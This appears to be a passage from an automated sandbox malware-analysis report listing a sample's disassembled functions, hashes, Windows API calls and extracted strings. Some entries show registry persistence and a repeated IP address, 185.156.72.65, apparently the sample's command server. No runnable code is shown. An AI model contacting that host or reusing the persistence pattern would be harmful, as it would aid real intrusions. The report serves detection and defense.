                      • Instruction ID: fe77cf6e914a26217c55e44d92327cfa7ecba26b6c3e6129390ec92a92f48862
                      • Opcode Fuzzy Hash: 3664762a9d608c19c218f0e7455b0922f4ac3b8ec9c00c4e8ed24b193deb0d0d
                      • Instruction Fuzzy Hash: 01616EF391C3049BE3046E3DDD8976ABBD5EBD4720F2A863DEAC4D3784E53599058242
                      Function 0048EF9F Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: @x
                      • API String ID: 0-4114048967
                      • Opcode ID: 1de122a1d19754526089f246eeecd15213fe1ba68d1292738393eacc5c3cc8df
                      • Instruction ID: 50bcf272d276c884256ecf8498a1192effcb1eaef612e30deb2c7f54eab935d4
                      • Opcode Fuzzy Hash: 1de122a1d19754526089f246eeecd15213fe1ba68d1292738393eacc5c3cc8df
                      • Instruction Fuzzy Hash: 2C614BF3A086105FE7086E3DEC8577AB7DAEBC4310F1A863DDA8593788E9355C048686
                      Function 00418592 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                      • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                      Function 00415E59 Relevance: .6, Instructions: 637COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                      • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                      Function 00587B2C Relevance: .2, Instructions: 201COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5d634fc501b88b48723fa7a2426c73aaaa170035a29c8184dd5190b288651ee0
                      • Instruction ID: d991833dc457d2847484513fb9a2b7162d63d7fbc55a295f6c780809d4d65f99
                      • Opcode Fuzzy Hash: 5d634fc501b88b48723fa7a2426c73aaaa170035a29c8184dd5190b288651ee0
                      • Instruction Fuzzy Hash: DA512DF3A042045BF300AE3DED8576BBBD7EBD4710F2AC539D6848BB48E97994458242
                      Function 005DFC9D Relevance: .2, Instructions: 190COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d96639b2a5cc5856a5959bb5444cd690dc50e8da5792d71ebf86004fd1b2fe
                      • Instruction ID: f59fc8d88817adbd4cb45038bff67e9ac44950dd6e4b8673e6aa643e8f50f2c4
                      • Opcode Fuzzy Hash: a3d96639b2a5cc5856a5959bb5444cd690dc50e8da5792d71ebf86004fd1b2fe
                      • Instruction Fuzzy Hash: C75145F3A082181BF7186A2DEC5573AB7DADBC4360F1A853DEB8687784E9391C054296
                      Function 00496466 Relevance: .2, Instructions: 185COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9df1e9d9a67b6b7203a17c38a4cd458339b88fef8cd7016f7f4f34357864428d
                      • Instruction ID: 9d2303b9af3c6784414418bc0414042e9e1ccdb8a801be1dc7df2bc5bd752c77
                      • Opcode Fuzzy Hash: 9df1e9d9a67b6b7203a17c38a4cd458339b88fef8cd7016f7f4f34357864428d
                      • Instruction Fuzzy Hash: 7D518BF3A192046FF30C6968EC65776778AE7D5320F2A853EE686D7784FC7948064282
                      Function 004EC5BA Relevance: .2, Instructions: 168COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8536c0e9ada8b95f744a29f0fb3e658691486ef5d32d01faaf319010ae0e1d5b
                      • Instruction ID: 9de0d790101cd4bef95c8b093d63d2519b92677260e4cd62aed6da23716017c9
                      • Opcode Fuzzy Hash: 8536c0e9ada8b95f744a29f0fb3e658691486ef5d32d01faaf319010ae0e1d5b
                      • Instruction Fuzzy Hash: 99519DB3F1162147F3444879CD98362298397D6324F2F82788A6CABBC6DC7E8C0B4384
                      Function 00707331 Relevance: .1, Instructions: 143COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7998bcef5acf580d7ae8cdf3f16a192013550e69c5ff7db1ec1735f1ec6c40c9
                      • Instruction ID: ba2affcf7759df0ab457c300be514a28cc73cc6ea1726af5d133014ccb732925
                      • Opcode Fuzzy Hash: 7998bcef5acf580d7ae8cdf3f16a192013550e69c5ff7db1ec1735f1ec6c40c9
                      • Instruction Fuzzy Hash: A341B1F251C300AFE319AF18D891A7AFBE9FF84720F16482EE6C5C3240E6355944CA67
                      Function 00473AF9 Relevance: .1, Instructions: 82COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e227b84d432efb3234ebf362bc9abbaa9b385481711b8c16fee587170fa09f47
                      • Instruction ID: f9c241a05a9f8ef8f38a11e497733fce4a76151ad4e8efade906fcefbf212e0a
                      • Opcode Fuzzy Hash: e227b84d432efb3234ebf362bc9abbaa9b385481711b8c16fee587170fa09f47
                      • Instruction Fuzzy Hash: E621B5B240420A9FCB01CF28C5415EF77E0FA46332725856BE84A97A13D3767E25AF4E
                      Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                      Function 0495B937 Relevance: .1, Instructions: 76COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 31093a781ad63aed303cabcd308a4e0756b12fe3fa5f3aaf202d1ed763eb6600
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: D91127B720018247D655CA3ED4B42B6E79DEFC6329B3C477AD8858B77AD222B144D700
                      Function 047A7D41 Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 08771eb7056d114c5da39982fe0a0733143f4f69ed40c61d8a9fd9b91280a921
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: 8C1182723401009FD754DF65DC90FA673EAEBC9220B198156ED04CB315E675FC11C760
                      Function 04950D90 Relevance: .0, Instructions: 43COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: cacfbc0c46e98c86a351d82b4132ac5c712cceccaeed7baca1d735253631f30a
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 3401A276A006049FDF21CF24C818BAA33E9EB86316F6544B5ED0A9B291E774B9458F90
                      Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • kernel32.dll, xrefs: 00409C00
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 2565136772-3242537097
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                      Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: DecodePointer
                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                      • API String ID: 3527080286-3064271455
                      • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                      • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                      • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                      Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                      • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                      • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                      • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                      Function 0495BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                      • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                      • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                      • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                      • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                      • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                      Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateOpenSleepValue
                      • String ID: 185.156.72.65$185.156.72.65$mixone
                      • API String ID: 4111408922-485810328
                      • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                      • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                      • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                      Function 04959E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                      • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                      • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                      • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                      • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                      • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                      • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                      • String ID:
                      • API String ID: 2565136772-0
                      • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                      • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                      • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                      Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                      • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                      • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                      Function 04964073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                      • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                      • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                      Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                        • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                      • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                      • String ID: 185.156.72.65$string too long
                      • API String ID: 2123813255-2459586365
                      • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                      • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                      • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                      Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 0040B837
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                      • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                      • _ValidateLocalCookies.LIBCMT ref: 0040B948
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                      Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                      Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                      • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                      Function 0495BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                      • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                      • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                      • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                      Function 04951867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule
                      APIs
                      • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                        • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
